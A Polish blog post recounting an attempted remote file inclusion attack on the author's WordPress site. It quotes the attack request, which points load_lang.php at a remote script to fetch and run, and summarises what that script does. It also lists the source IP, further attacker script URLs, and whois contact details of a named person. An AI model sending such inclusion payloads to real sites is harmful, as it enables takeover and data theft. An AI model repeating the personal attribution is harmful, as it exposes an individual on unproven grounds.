load_lang.php?_SERWEB[configdir]=

Takim o to zapytaniem ktoś próbował mi zhackować WordPressa a dokładniej:

/load_lang.php?_SERWEB[configdir]=http://for.caucasus.net/nit.txt??

Czyżby to była jakaś dziura w WordPress 2.8.2, spróbuję się dowiedzieć najpierw w rodzimym nieprzydanym języku potem pomęczę się z tłumaczeniem pytania to inglisz…

Wszystko z jednego IP: 67.215.229.226

Oczywiście jak najszybciej zaktualizowałem do 2.8.3, która jest wersją poprawiająca poprawki…

A co się znajdowało pod: http://for.caucasus.net/nit.txt

Otóż ciekawy i długi kod z którego można się wiele nauczyć. Tak pobieżnie: kasuje, robi kopie zapasową, wysyła co popadanie. przypomina to jakiegoś gotowca czy coś podobnego a no i wysyła wszystkie kopie plików na email.

jako że plugin do kolorowania składni wywala błąd 500 serwera to kod jest dostępny tu:
kod nit.txt Georgian hacker Nitrex
load_lang.php Remote File Inclusion Exploit to wiemy do czego skrypt jest

Nasz niedoszły hacker podpisuje się:

< ?
; – This Web Was Hacked And Rooted By Georgian Hacker Nitrex
?>;

Doszukując się dalszych powiązań:

person: Alexander Shakh-Nazarov
phone: +995 32 920000
e-mail: shakh@caucasus.net
nic-hdl: AS2778-RIPE
address: Caucasus Network
address: 42 Rustaveli ave.
address: Tbilisi, Georgia

Whois jednej z powiązanych domen.

I jeszcze trochę domen i skryptów:

http://www.geneseobeadstudio.com/safe.txt
http://www.geneseobeadstudio.com/cmd.txt
http://geocities.com/machinekill/cmd.txt
zhani-kalandadze.ge